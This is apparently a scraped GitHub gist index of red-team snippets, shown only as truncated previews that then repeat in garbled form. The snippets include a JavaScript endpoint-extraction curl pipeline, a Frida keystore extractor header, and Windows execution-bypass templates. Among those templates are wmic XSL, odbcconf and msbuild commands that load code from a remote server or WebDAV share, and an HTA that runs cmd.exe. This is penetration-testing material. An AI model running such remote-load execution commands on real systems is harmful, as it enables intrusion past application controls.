jayaramyalla

## ejs.sh
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# debug mode and absolute/relative urls support (the best one):
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d

## frida-extract-keystore.py
#!/usr/bin/python3

'''
author: ceres-c
usage: ./frida-extract-keystore.py
       Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool
'''

import frida, sys, time

## checksvc.py
import os
import subprocess
import ctypes

# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/

svcinfo = {}
nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG']
FNULL = open(os.devnull, 'w')

## windows-toolkit.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                jayaramyalla
                / windows-toolkit.md
            
            
              Created
              December 28, 2018 19:51
                — forked from jthuraisamy/windows-toolkit.md
            
              
                Windows Toolkit
              
          
    Windows Toolkit

Binary

Native Binaries


IDA Pro


IDA Plugins
Preferred
Neutral
Unreviewed


## WAHH_Task_Checklist.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                jayaramyalla
                / WAHH_Task_Checklist.md
            
            
              Created
              December 1, 2018 04:55
                — forked from jhaddix/Testing_Checklist.md
            
              
                The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
              
          
    The Web Application Hacker's Handbook

Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
Contents


Recon and analysis
Test handling of access
Test handling of input
Test application logic
Assess application hosting
Miscellaneous tests


## msigen.wix
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">

## wmic.xsl
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[

## odbcconf.cs
/*
To use with odbcconf.exe:

odbcconf /S /A {REGSVR odbcconf.dll}

or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/

using System;

## msbuild.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## calc.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
        var c = "cmd.exe /c calc.exe";
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
	curl -L -k -s https://www.example.com \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| awk -F '//' '{if(length($2))print "https://"$2}' \| sort -fu \| xargs -I '%' sh -c "curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \| awk -F "['\"]" '{print $2}' \| sort -fu

	# debug mode and absolute/relative urls support (the best one):
	function ejs() {
	URL=$1;
	curl -Lks $URL \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| sed -r "s/^src['\"]?[=:]['\"]//g" \| awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' \| sort -fu \| xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"('#####.)\|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" \| sort -fu" \| tr -d
	#!/usr/bin/python3

	'''
	author: ceres-c
	usage: ./frida-extract-keystore.py
	Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool
	'''

	import frida, sys, time
	import os
	import subprocess
	import ctypes

	# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/

	svcinfo = {}
	nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG']
	FNULL = open(os.devnull, 'w')
	<?xml version="1.0"?>
	<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
	<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
	<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
	<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

	<Directory Id="TARGETDIR" Name="SourceDir">
	<Directory Id="ProgramFilesFolder">
	<Directory Id="INSTALLLOCATION" Name="Example">
	<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
	<?xml version='1.0'?>
	<!-- Discovered by @SubTee and @mattifestation -->
	<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
	<stylesheet
	xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
	xmlns:user="placeholder"
	version="1.0">
	<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	/*
	To use with odbcconf.exe:

	odbcconf /S /A {REGSVR odbcconf.dll}

	or, from a remote location (if WebDAV support enabled):
	odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
	*/

	using System;
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"
	<html>
	<head>
	<HTA:APPLICATION ID="HelloExample">
	<script language="jscript">
	var c = "cmd.exe /c calc.exe";
	new ActiveXObject('WScript.Shell').Run(c);
	</script>
	</head>
	<body>
	<script>self.close();</script>